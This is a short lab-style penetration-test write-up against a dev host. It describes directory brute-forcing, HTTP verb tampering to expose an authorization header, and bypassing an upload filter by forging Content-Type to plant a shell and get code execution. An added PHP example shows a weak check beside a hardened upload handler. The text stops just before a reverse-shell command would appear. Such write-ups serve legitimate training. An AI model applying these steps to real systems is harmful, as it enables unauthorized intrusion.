dev.inlanefreight.local

Just a login page. But it's a dev page so we gotta dig deeper. I tried SQL injection attacks but they didn't work.
Sub-directory Brute Force
The uploads .php and directory caught my attention. It shows code 200 for the .php page but when I try to open it I get 403 Forbidden. Which is weird, so I open it in Burp.
HTTP Verb Tampering
Using OPTIONS we see that the following options are allowed.

I tried all of them and only POST and TRACK seem to work. Apparently the TRACK option shows us that the X-Custom-IP-Authorization: header is set in the HTTP response.
Adding this option to our request and sending it gives us an interesting webpage that says 'development mode'.

Opening it in the browser gives us the option to upload files. Only images are allowed.

The restriction can be bypassed by changing the file content type header field and we are able to upload the shell. And we get RCE.


Sadly this is out of scope :(
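
A filter that can be bypassed by editing the Content-Type field is trusting a value the client controls. As an added example (not code from the target application or from this write-up), here is that weak check beside a hardened PHP upload handler; the function names, the ALLOWED list and the demo file are assumptions made for illustration.

```php
<?php
// Added example, not the target application's code. ALLOWED, the function
// names and the demo file are assumptions made for illustration.
const ALLOWED = ['image/png' => 'png', 'image/jpeg' => 'jpg', 'image/gif' => 'gif'];

// Weak check: $file['type'] is copied from the Content-Type field of the
// multipart request, so the client chooses its value.
function weak_is_image(array $file): bool
{
    return array_key_exists($file['type'], ALLOWED);
}

// Hardened check: ignore the client-supplied type and file name and detect
// the type from the file's bytes. Returns the extension to store the file
// under, or null to reject it.
function detect_image_ext(string $path): ?string
{
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($path);
    return is_string($mime) ? (ALLOWED[$mime] ?? null) : null;
}

// Full handler for one $_FILES entry. $destDir is assumed to be outside the
// web root (or served with script execution disabled).
function store_upload(array $file, string $destDir): ?string
{
    if ($file['error'] !== UPLOAD_ERR_OK || !is_uploaded_file($file['tmp_name'])) {
        return null;
    }
    $ext = detect_image_ext($file['tmp_name']);
    if ($ext === null) {
        return null;
    }
    // Server-chosen name and extension: nothing from $file['name'] is reused,
    // so the stored file never ends in .php whatever the client called it.
    $target = $destDir . '/' . bin2hex(random_bytes(16)) . '.' . $ext;
    return move_uploaded_file($file['tmp_name'], $target) ? $target : null;
}

// Constructed demo input: a script body that the client labels as a PNG.
$tmp = tempnam(sys_get_temp_dir(), 'up');
file_put_contents($tmp, "<?php echo 'constructed sample'; ?>");
$entry = ['name' => 'x.php', 'type' => 'image/png', 'tmp_name' => $tmp, 'error' => UPLOAD_ERR_OK];
var_dump(weak_is_image($entry));   // decision taken from the client's header
var_dump(detect_image_ext($tmp));  // decision taken from the file content
unlink($tmp);
```

Content detection alone does not make an uploaded file safe to execute; the server-assigned extension and a storage location where scripts do not run are what keep an accepted file inert.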

I wanted a reverse shell so I started a listener and ran this: